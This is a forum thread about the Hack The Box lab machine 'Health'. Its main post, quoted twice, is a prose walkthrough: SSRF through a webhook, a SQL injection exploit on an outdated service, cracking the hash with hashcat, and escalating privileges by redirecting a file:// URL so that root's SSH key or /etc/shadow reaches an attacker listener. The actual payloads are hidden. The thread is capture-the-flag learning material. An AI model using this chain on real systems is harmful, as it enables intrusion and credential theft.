Return to forum
Health - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
Member
Member
Posts: 12
Threads: 0
Joined: N/A
Reputation: 1

#81
August 22, 2022 at 4:04 AM
(August 22, 2022, 03:34 AM)NoobHTB Wrote:
(August 21, 2022, 09:10 PM)hackthebaaax Wrote: someone help me to break the hash?, I have the passwd and salt but I can't break it maybe my format is wrong


Have you cracked the hash?


yeah
Reply
Advanced User
Advanced
Posts: 51
Threads: 0
Joined: N/A
Reputation: 14

#82
August 22, 2022 at 4:11 AM
(August 22, 2022, 04:04 AM)hackthebaaax Wrote:
(August 22, 2022, 03:34 AM)NoobHTB Wrote:
(August 21, 2022, 09:10 PM)hackthebaaax Wrote: someone help me to break the hash?, I have the passwd and salt but I can't break it maybe my format is wrong


Have you cracked the hash?


yeah


I have pm you, could you check it?
Reply
Advanced User
Advanced
Posts: 73
Threads: 0
Joined: N/A
Reputation: 11

#83
August 22, 2022 at 6:52 AM
(August 21, 2022, 07:16 AM)rdre8 Wrote: This one warms up after about 4:00 and discusses SSRF and webhooks in general terms: https://www.youtube.com/watch?v=xF2XUKtYaTg

That make sense and helpful, thank you.
Reply
Elite User
Elite
Posts: 132
Threads: 0
Joined: N/A
Reputation: 5

#84
August 22, 2022 at 8:16 AM
If you struggle formatting the hashcat hash use this tool:
https://github.com/shinris3n/GogsToHashcat
Enjoy :)
Reply
Member
Member
Posts: 20
Threads: 0
Joined: N/A
Reputation: 9

#85
August 22, 2022 at 3:00 PM
For all the new people trying to learn the basics of this room, should be consider a medium box if you don't have any other experience with SQLi or SSRF.

Here's a little summary of the correct path to follow (mostly explained on this thread) without too many spoilers.... :

  • Your nmap scan should have reported 2 open ports and 1 filtered port, right? (if not, scan again...)
  • Let's leave the 22 and the other port for later, and let's see what's on the web port (80).
  • Looks like a health check page, with webhooks, callbacks and everything.
  • Try listening on two ports with netcat, for example listen on port 9999 and on port 1337 (because we are h4x0rs). Use the port 9999 as your "Payload URL" and the port 1337 as the "Monitored URL"
    Hidden Content
    You must register or login to view this content.
  • Try with the "Test" option. You should receive the connection on port 1337 first and if you hit CTRL - c you will receive the second connection with some information on port 9999. This should start giving you some ideas of the attacking vector....
  • Get back to your nmap report, we found a "filtered" port... Maybe we can access to this port with the health check page. like
    Hidden Content
    You must register or login to view this content.
    . Unluckily this is filtered, but we can use an HTTP redirector. That is basically a "server" that listens on a desired port and redirects all the requests to a desired link. in this case the port 3000 of the victim machine. (Google it, it's quite common and not so hard to use, otherwise, check some previous replies on this thread.)
  • Great! Now we can see the service and version that's listening on port 3000! Do you see that? It's and old version... We have for sure some kind of exploit... (Google is your friend). You will finally get an
    Hidden Content
    You must register or login to view this content.
    CHECK THE NOTE FROM THE EXPLOIT! There are some bad chars!!
  • Start enumerating the database, version, scheme, tables, columns, and finally dump the things that you need!
    Hidden Content
    You must register or login to view this content.
  • Now with all that data, we need to format it to after crack it, if you google something like "[thenameoftheservice]{G**} hash format for hashcat", you will find the formatter, and I think someone already post it here...
  • Format it, crack it with hashcat, mode "10900" and rockyou, should not take it too long, maybe 5 mins, if you pass the 90k tried passwords, something is wrong....
  • Yes! You now have the plain text password, use them on ssh.
  • Root part: @11231123 made a great summary, so I'll try not to make it too deep on the topics...
  • Check the background jobs, use pspy or create a procmon with bash (useful if you don't want to download and upload binaries...)
  • Someone with high privileges is running a cron job on a directory that you can read...
  • Get as many information as possible about that "function/binary" on Google, and check the source code, what function is vulnerable?  How did you get your foothold? Can you use it to escalate privileges?
  • Get the MySql credentials from the environment file, and log in to the service with that credentials.
  • Now create a simple "Health check" web-hook from the page, where the "Payload URL" is going to be the listener where you receive the file that you want.
  • Inside the database, you will find a table with a showy name... If you select all the values inside it, you will find your PE vector....
  • If you did all the above steps, this is not necessary, but if you didn't... here we go --> update the value of the "Monitored URL" inside the table to a file that you want to read, like the id_rsa of root or the root.txt flag o /etc/shadow, whatever... use the "file wrapper" (I mean file:///tmp/file.txt).
  • If you did everything good, after a minute or so you should receive a connection to your listener with the content of the file. (Remember that's JSON safe encoded, so you should replace all the \t with a TAB, all the
    with a LINEBREAK, remove backslashes [\] and you are done!)
  • PWNED! :D


I hope I have been as clear as possible, without giving too many hints....

Sorry for the long reply... but it's almost a full writeup xD
Reply
Member
Member
Posts: 30
Threads: 0
Joined: N/A
Reputation: 0

#86
August 22, 2022 at 3:12 PM
(August 22, 2022, 03:00 PM)lnf02 Wrote: For all the new people trying to learn the basics of this room, should be consider a medium box if you don't have any other experience with SQLi or SSRF.

Here's a little summary of the correct path to follow (mostly explained on this thread) without too many spoilers.... :
  • Your nmap scan should have reported 2 open ports and 1 filtered port, right? (if not, scan again...)
  • Let's leave the 22 and the other port for later, and let's see what's on the web port (80).
  • Looks like a health check page, with webhooks, callbacks and everything.
  • Try listening on two ports with netcat, for example listen on port 9999 and on port 1337 (because we are h4x0rs). Use the port 9999 as your "Payload URL" and the port 1337 as the "Monitored URL"
  • Now with all that data, we need to format it to after crack it, if you google something like "[thenameoftheservice]{G**} hash format for hashcat", you will find the formatter, and I think someone already post it here...
  • Format it, crack it with hashcat, mode "10900" and rockyou, should not take it too long, maybe 5 mins, if you pass the 90k tried passwords, something is wrong....
  • Yes! You now have the plain text password, use them on ssh.
  • Root part: @11231123 made a great summary, so I'll try not to make it too deep on the topics...
  • Check the background jobs, use pspy or create a procmon with bash (useful if you don't want to download and upload binaries...)
  • Someone with high privileges is running a cron job on a directory that you can read... 
  • Get as many information as possible about that "function/binary" on Google, and check the source code, what function is vulnerable?  How did you get your foothold? Can you use it to escalate privileges?
  • Get the MySql credentials from the environment file, and log in to the service with that credentials.
  • Now create a simple "Health check" web-hook from the page, where the "Payload URL" is going to be the listener where you receive the file that you want.
  • Inside the database, you will find a table with a showy name... If you select all the values inside it, you will find your PE vector....
  • If you did all the above steps, this is not necessary, but if you didn't... here we go --> update the value of the "Monitored URL" inside the table to a file that you want to read, like the id_rsa of root or the root.txt flag o /etc/shadow, whatever... use the "file wrapper" (I mean file:///tmp/file.txt). 
  • If you did everything good, after a minute or so you should receive a connection to your listener with the content of the file. (Remember that's JSON safe encoded, so you should replace all the \t with a TAB, all the
    with a LINEBREAK, remove backslashes [\] and you are done!)
  • PWNED! :D
I hope I have been as clear as possible, without giving too many hints....

Sorry for the long reply... but it's almost a full writeup xD


great thanks !
Reply
Member
Member
Posts: 1
Threads: 0
Joined: N/A
Reputation: 0

#87
August 22, 2022 at 3:23 PM
(August 22, 2022, 03:00 PM)lnf02 Wrote: For all the new people trying to learn the basics of this room, should be consider a medium box if you don't have any other experience with SQLi or SSRF.

Here's a little summary of the correct path to follow (mostly explained on this thread) without too many spoilers.... :
  • Your nmap scan should have reported 2 open ports and 1 filtered port, right? (if not, scan again...)
  • Let's leave the 22 and the other port for later, and let's see what's on the web port (80).
  • Looks like a health check page, with webhooks, callbacks and everything.
  • Try listening on two ports with netcat, for example listen on port 9999 and on port 1337 (because we are h4x0rs). Use the port 9999 as your "Payload URL" and the port 1337 as the "Monitored URL"
  • Now with all that data, we need to format it to after crack it, if you google something like "[thenameoftheservice]{G**} hash format for hashcat", you will find the formatter, and I think someone already post it here...
  • Format it, crack it with hashcat, mode "10900" and rockyou, should not take it too long, maybe 5 mins, if you pass the 90k tried passwords, something is wrong....
  • Yes! You now have the plain text password, use them on ssh.
  • Root part: @11231123 made a great summary, so I'll try not to make it too deep on the topics...
  • Check the background jobs, use pspy or create a procmon with bash (useful if you don't want to download and upload binaries...)
  • Someone with high privileges is running a cron job on a directory that you can read... 
  • Get as many information as possible about that "function/binary" on Google, and check the source code, what function is vulnerable?  How did you get your foothold? Can you use it to escalate privileges?
  • Get the MySql credentials from the environment file, and log in to the service with that credentials.
  • Now create a simple "Health check" web-hook from the page, where the "Payload URL" is going to be the listener where you receive the file that you want.
  • Inside the database, you will find a table with a showy name... If you select all the values inside it, you will find your PE vector....
  • If you did all the above steps, this is not necessary, but if you didn't... here we go --> update the value of the "Monitored URL" inside the table to a file that you want to read, like the id_rsa of root or the root.txt flag o /etc/shadow, whatever... use the "file wrapper" (I mean file:///tmp/file.txt). 
  • If you did everything good, after a minute or so you should receive a connection to your listener with the content of the file. (Remember that's JSON safe encoded, so you should replace all the \t with a TAB, all the
    with a LINEBREAK, remove backslashes [\] and you are done!)
  • PWNED! :D
I hope I have been as clear as possible, without giving too many hints....

Sorry for the long reply... but it's almost a full writeup xD


Thanks!!!
Reply
Member
Member
Posts: 9
Threads: 0
Joined: N/A
Reputation: 0

#88
August 22, 2022 at 4:01 PM
Great Thanx
Reply
Member
Member
Posts: 14
Threads: 0
Joined: N/A
Reputation: 0

#89
August 22, 2022 at 4:03 PM
!!!!!!!!!!!!!!
Reply
Member
Member
Posts: 22
Threads: 0
Joined: N/A
Reputation: 0

#90
August 22, 2022 at 4:25 PM
thanks dude
Reply


 Users viewing this thread: Health - HTB [Discussion]: No users currently viewing.